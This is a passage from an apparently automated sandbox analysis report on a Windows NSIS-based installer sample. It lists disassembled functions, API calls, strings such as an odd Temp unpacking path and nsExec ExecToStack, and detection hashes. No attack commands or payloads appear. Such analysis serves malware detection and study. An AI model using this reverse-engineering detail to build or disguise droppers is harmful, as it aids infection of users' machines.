4042a5-4042b6 SendMessageW 272->273 274 4042b8 272->274 275 4042be-4042fd call 404498 call 403f45 call 406507 lstrlenW call 406544 SetWindowTextW call 401389 273->275 274->275 275->218 286 404303-404305 275->286 286->218 287 40430b-40430f 286->287 288 404311-404317 287->288 289 40432e-404342 DestroyWindow 287->289 288->217 290 40431d-404323 288->290 289->221 291 404348-404375 CreateDialogParamW 289->291 290->218 292 404329 290->292 291->221 293 40437b-4043d2 call 404463 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 291->293 292->217 293->217 298 4043d4-4043e7 ShowWindow call 4044af 293->298 300 4043ec 298->300 300->221
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FA0
                                                                                                                                                                            • ShowWindow.USER32(?), ref: 00403FC0
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00403FD2
                                                                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 00403FEB
                                                                                                                                                                            • DestroyWindow.USER32 ref: 00403FFF
                                                                                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404018
                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 00404037
                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040404B
                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00404052
                                                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 004040FD
                                                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00404107
                                                                                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00404121
                                                                                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404172
                                                                                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00404218
                                                                                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00404239
                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040424B
                                                                                                                                                                            • EnableWindow.USER32(?,?), ref: 00404266
                                                                                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040427C
                                                                                                                                                                            • EnableMenuItem.USER32(00000000), ref: 00404283
                                                                                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040429B
                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042AE
                                                                                                                                                                            • lstrlenW.KERNEL32(00423708,?,00423708,00000000), ref: 004042D8
                                                                                                                                                                            • SetWindowTextW.USER32(?,00423708), ref: 004042EC
                                                                                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 00404420
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 121052019-0
                                                                                                                                                                            • Opcode ID: 66e8e1124669f3008a4bd8227f077bc543d240224f138d8a0267bdb9be33da1e
                                                                                                                                                                            • Instruction ID: 63d0405a778065079f0a8243b170f3468528db945c37da0c1c9e117f306831cd
                                                                                                                                                                            • Opcode Fuzzy Hash: 66e8e1124669f3008a4bd8227f077bc543d240224f138d8a0267bdb9be33da1e
                                                                                                                                                                            • Instruction Fuzzy Hash: 30C1D2B1600205EBDB306F61ED89E3A3A68EB94709F51053EF791B11F0CB795852DB2E
                                                                                                                                                                            Function 00403BB6 Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215stringregistryCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 301 403bb6-403bce call 4068d4 304 403bd0-403be0 call 40644e 301->304 305 403be2-403c19 call 4063d5 301->305 314 403c3c-403c65 call 403e8c call 405ede 304->314 310 403c31-403c37 lstrcatW 305->310 311 403c1b-403c2c call 4063d5 305->311 310->314 311->310 319 403cf7-403cff call 405ede 314->319 320 403c6b-403c70 314->320 326 403d01-403d08 call 406544 319->326 327 403d0d-403d32 LoadImageW 319->327 320->319 321 403c76-403c9e call 4063d5 320->321 321->319 328 403ca0-403ca4 321->328 326->327 330 403db3-403dbb call 40140b 327->330 331 403d34-403d64 RegisterClassW 327->331 332 403cb6-403cc2 lstrlenW 328->332 333 403ca6-403cb3 call 405e03 328->333 344 403dc5-403dd0 call 403e8c 330->344 345 403dbd-403dc0 330->345 334 403e82 331->334 335 403d6a-403dae SystemParametersInfoW CreateWindowExW 331->335 339 403cc4-403cd2 lstrcmpiW 332->339 340 403cea-403cf2 call 405dd6 call 406507 332->340 333->332 338 403e84-403e8b 334->338 335->330 339->340 343 403cd4-403cde GetFileAttributesW 339->343 340->319 348 403ce0-403ce2 343->348 349 403ce4-403ce5 call 405e22 343->349 354 403dd6-403df0 ShowWindow call 406864 344->354 355 403e59-403e5a call 40563c 344->355 345->338 348->340 348->349 349->340 362 403df2-403df7 call 406864 354->362 363 403dfc-403e0e GetClassInfoW 354->363 359 403e5f-403e61 355->359 360 403e63-403e69 359->360 361 403e7b-403e7d call 40140b 359->361 360->345 364 403e6f-403e76 call 40140b 360->364 361->334 362->363 367 403e10-403e20 GetClassInfoW RegisterClassW 363->367 368 403e26-403e49 DialogBoxParamW call 40140b 363->368 364->345 367->368 372 403e4e-403e57 call 403b06 368->372 372->338
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004068D4: GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
                                                                                                                                                                              • Part of subcall function 004068D4: GetProcAddress.KERNEL32(00000000,?), ref: 00406901
                                                                                                                                                                            • lstrcatW.KERNEL32(1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403C37
                                                                                                                                                                            • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,75923420), ref: 00403CB7
                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000), ref: 00403CCA
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(: Completed,?,00000000,?), ref: 00403CD5
                                                                                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner), ref: 00403D1E
                                                                                                                                                                              • Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B
                                                                                                                                                                            • RegisterClassW.USER32(004291C0), ref: 00403D5B
                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403D73
                                                                                                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DA8
                                                                                                                                                                            • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403DDE
                                                                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004291C0), ref: 00403E0A
                                                                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,004291C0), ref: 00403E17
                                                                                                                                                                            • RegisterClassW.USER32(004291C0), ref: 00403E20
                                                                                                                                                                            • DialogBoxParamW.USER32(?,00000000,00403F64,00000000), ref: 00403E3F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                            • String ID: .DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                            • API String ID: 1975747703-2176109169
                                                                                                                                                                            • Opcode ID: 6641f25268bcb411ff60996ee06ee97a96bb8d093e03f8a241686f6243dfe293
                                                                                                                                                                            • Instruction ID: f8e28dda484975e23f2397f6e39507faffe4a9094113ace64084d81fe028ea3a
                                                                                                                                                                            • Opcode Fuzzy Hash: 6641f25268bcb411ff60996ee06ee97a96bb8d093e03f8a241686f6243dfe293
                                                                                                                                                                            • Instruction Fuzzy Hash: B761D570244200BBD720AF66AD45F2B3A6CEB84B49F40453FFD41B62E1DB795912CA7D
                                                                                                                                                                            Function 0040307D Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 375 40307d-4030cb GetTickCount GetModuleFileNameW call 405ff7 378 4030d7-403105 call 406507 call 405e22 call 406507 GetFileSize 375->378 379 4030cd-4030d2 375->379 387 4031f0-4031fe call 403019 378->387 388 40310b 378->388 380 4032ad-4032b1 379->380 394 403200-403203 387->394 395 403253-403258 387->395 390 403110-403127 388->390 392 403129 390->392 393 40312b-403134 call 403499 390->393 392->393 401 40325a-403262 call 403019 393->401 402 40313a-403141 393->402 397 403205-40321d call 4034af call 403499 394->397 398 403227-403251 GlobalAlloc call 4034af call 4032b4 394->398 395->380 397->395 423 40321f-403225 397->423 398->395 421 403264-403275 398->421 401->395 406 403143-403157 call 405fb2 402->406 407 4031bd-4031c1 402->407 412 4031cb-4031d1 406->412 426 403159-403160 406->426 411 4031c3-4031ca call 403019 407->411 407->412 411->412 418 4031e0-4031e8 412->418 419 4031d3-4031dd call 4069c1 412->419 418->390 422 4031ee 418->422 419->418 428 403277 421->428 429 40327d-403282 421->429 422->387 423->395 423->398 426->412 427 403162-403169 426->427 427->412 431 40316b-403172 427->431 428->429 432 403283-403289 429->432 431->412 433 403174-40317b 431->433 432->432 434 40328b-4032a6 SetFilePointer call 405fb2 432->434 433->412 435 40317d-40319d 433->435 438 4032ab 434->438 435->395 437 4031a3-4031a7 435->437 439 4031a9-4031ad 437->439 440 4031af-4031b7 437->440 438->380 439->422 439->440 440->412 441 4031b9-4031bb 440->441 441->412
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0040308E
                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\fGu8xWoMrg.exe,00000400,?,?,?,?,?,00403847,?), ref: 004030AA
                                                                                                                                                                              • Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\fGu8xWoMrg.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                                                                                                                                                                              • Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fGu8xWoMrg.exe,C:\Users\user\Desktop\fGu8xWoMrg.exe,80000000,00000003,?,?,?,?,?,00403847), ref: 004030F6
                                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000040,G8@,?,?,?,?,?,00403847,?), ref: 0040322C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\fGu8xWoMrg.exe$Error launching installer$G8@$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                            • API String ID: 2803837635-1469880417
                                                                                                                                                                            • Opcode ID: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
                                                                                                                                                                            • Instruction ID: 1a01736021049f1647ec9a5272654600d533d4cd09788acd7f842f4bfc25432a
                                                                                                                                                                            • Opcode Fuzzy Hash: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
                                                                                                                                                                            • Instruction Fuzzy Hash: 06518371901205AFDB209F65DD82B9E7EACEB09756F10807BF901B62D1C77C8F418A6D
                                                                                                                                                                            Function 00406544 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196stringCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 442 406544-40654f 443 406551-406560 442->443 444 406562-406578 442->444 443->444 445 406590-406599 444->445 446 40657a-406587 444->446 448 406774-40677f 445->448 449 40659f 445->449 446->445 447 406589-40658c 446->447 447->445 451 406781-406785 call 406507 448->451 452 40678a-40678b 448->452 450 4065a4-4065b1 449->450 450->448 453 4065b7-4065c0 450->453 451->452 455 406752 453->455 456 4065c6-406603 453->456 457 406760-406763 455->457 458 406754-40675e 455->458 459 4066f6-4066fb 456->459 460 406609-406610 456->460 461 406765-40676e 457->461 458->461 462 4066fd-406703 459->462 463 40672e-406733 459->463 464 406612-406614 460->464 465 406615-406617 460->465 461->448 466 4065a1 461->466 467 406713-40671f call 406507 462->467 468 406705-406711 call 40644e 462->468 471 406742-406750 lstrlenW 463->471 472 406735-40673d call 406544 463->472 464->465 469 406654-406657 465->469 470 406619-406637 call 4063d5 465->470 466->450 483 406724-40672a 467->483 468->483 473 406667-40666a 469->473 474 406659-406665 GetSystemDirectoryW 469->474 484 40663c-406640 470->484 471->461 472->471 480 4066d3-4066d5 473->480 481 40666c-40667a GetWindowsDirectoryW 473->481 479 4066d7-4066db 474->479 487 4066dd-4066e1 479->487 488 4066ee-4066f4 call 40678e 479->488 480->479 486 40667c-406684 480->486 481->480 483->471 485 40672c 483->485 484->487 489 406646-40664f call 406544 484->489 485->488 493 406686-40668f 486->493 494 40669b-4066b1 SHGetSpecialFolderLocation 486->494 487->488 490 4066e3-4066e9 lstrcatW 487->490 488->471 489->479 490->488 499 406697-406699 493->499 497 4066b3-4066cd SHGetPathFromIDListW CoTaskMemFree 494->497 498 4066cf 494->498 497->479 497->498 498->480 499->479 499->494
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 0040665F
                                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,004055A0,Completed,00000000,00000000,00418EC0,00000000), ref: 00406672
                                                                                                                                                                            • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                                                                                                                                            • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                                                                                                            • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                            • API String ID: 4260037668-905382516
                                                                                                                                                                            • Opcode ID: 4f256cf52d51bc45a82507bfe95e0a7ec11cb3c5eab23a7c9971658e825af729
                                                                                                                                                                            • Instruction ID: a0e829acba6452fa9eccf544198c9fcc7de98ae724d9d0e98a153b46e40356ac
                                                                                                                                                                            • Opcode Fuzzy Hash: 4f256cf52d51bc45a82507bfe95e0a7ec11cb3c5eab23a7c9971658e825af729
                                                                                                                                                                            • Instruction Fuzzy Hash: 5261E371A00215ABDB209F64DC40AAE37A5EF44318F11813AE957B72D0D77E8AA1CB5D
                                                                                                                                                                            Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 564 40176f-401794 call 402da6 call 405e4d 569 401796-40179c call 406507 564->569 570 40179e-4017b0 call 406507 call 405dd6 lstrcatW 564->570 575 4017b5-4017b6 call 40678e 569->575 570->575 579 4017bb-4017bf 575->579 580 4017c1-4017cb call 40683d 579->580 581 4017f2-4017f5 579->581 588 4017dd-4017ef 580->588 589 4017cd-4017db CompareFileTime 580->589 582 4017f7-4017f8 call 405fd2 581->582 583 4017fd-401819 call 405ff7 581->583 582->583 591 40181b-40181e 583->591 592 40188d-4018b6 call 405569 call 4032b4 583->592 588->581 589->588 593 401820-40185e call 406507 * 2 call 406544 call 406507 call 405b67 591->593 594 40186f-401879 call 405569 591->594 604 4018b8-4018bc 592->604 605 4018be-4018ca SetFileTime 592->605 593->579 626 401864-401865 593->626 606 401882-401888 594->606 604->605 608 4018d0-4018db CloseHandle 604->608 605->608 609 402c33 606->609 611 4018e1-4018e4 608->611 612 402c2a-402c2d 608->612 613 402c35-402c39 609->613 616 4018e6-4018f7 call 406544 lstrcatW 611->616 617 4018f9-4018fc call 406544 611->617 612->609 623 401901-4023a2 call 405b67 616->623 617->623 623->612 623->613 626->606 628 401867-401868 626->628 628->594
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner,?,?,00000031), ref: 004017B0
                                                                                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner,?,?,00000031), ref: 004017D5
                                                                                                                                                                              • Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514
                                                                                                                                                                              • Part of subcall function 00405569: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                                                                                                                                                              • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                                                                                                                                                              • Part of subcall function 00405569: lstrcatW.KERNEL32(Completed,004033ED,004033ED,Completed,00000000,00418EC0,00000000), ref: 004055C4
                                                                                                                                                                              • Part of subcall function 00405569: SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
                                                                                                                                                                              • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                                                                                                                                                              • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                                                                                                                                                              • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner$C:\Users\user\AppData\Local\Temp\nsc9301.tmp\nsExec.dll$ExecToStack
                                                                                                                                                                            • API String ID: 1941528284-681225680
                                                                                                                                                                            • Opcode ID: cff18b76cdb8d76bbb3d49e6b079a2043f43baf22f2567b8a93e71465b720055
                                                                                                                                                                            • Instruction ID: a51aac5e68297d7f44276dbadf5c543e50a4c9306f3e74aef663979029aae524
                                                                                                                                                                            • Opcode Fuzzy Hash: cff18b76cdb8d76bbb3d49e6b079a2043f43baf22f2567b8a93e71465b720055
                                                                                                                                                                            • Instruction Fuzzy Hash: AA41A071900105BACF11BBA5DD85DAE3AB9EF45328F20423FF412B10E1D63C8A519A6E
                                                                                                                                                                            Function 00405569 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 630 405569-40557e 631 405584-405595 630->631 632 405635-405639 630->632 633 4055a0-4055ac lstrlenW 631->633 634 405597-40559b call 406544 631->634 636 4055c9-4055cd 633->636 637 4055ae-4055be lstrlenW 633->637 634->633 639 4055dc-4055e0 636->639 640 4055cf-4055d6 SetWindowTextW 636->640 637->632 638 4055c0-4055c4 lstrcatW 637->638 638->636 641 4055e2-405624 SendMessageW * 3 639->641 642 405626-405628 639->642 640->639 641->642 642->632 643 40562a-40562d 642->643 643->632
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                                                                                                                                                            • lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                                                                                                                                                            • lstrcatW.KERNEL32(Completed,004033ED,004033ED,Completed,00000000,00418EC0,00000000), ref: 004055C4
                                                                                                                                                                            • SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                                                                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                                                                                                                                                              • Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                                                                                                                                              • Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
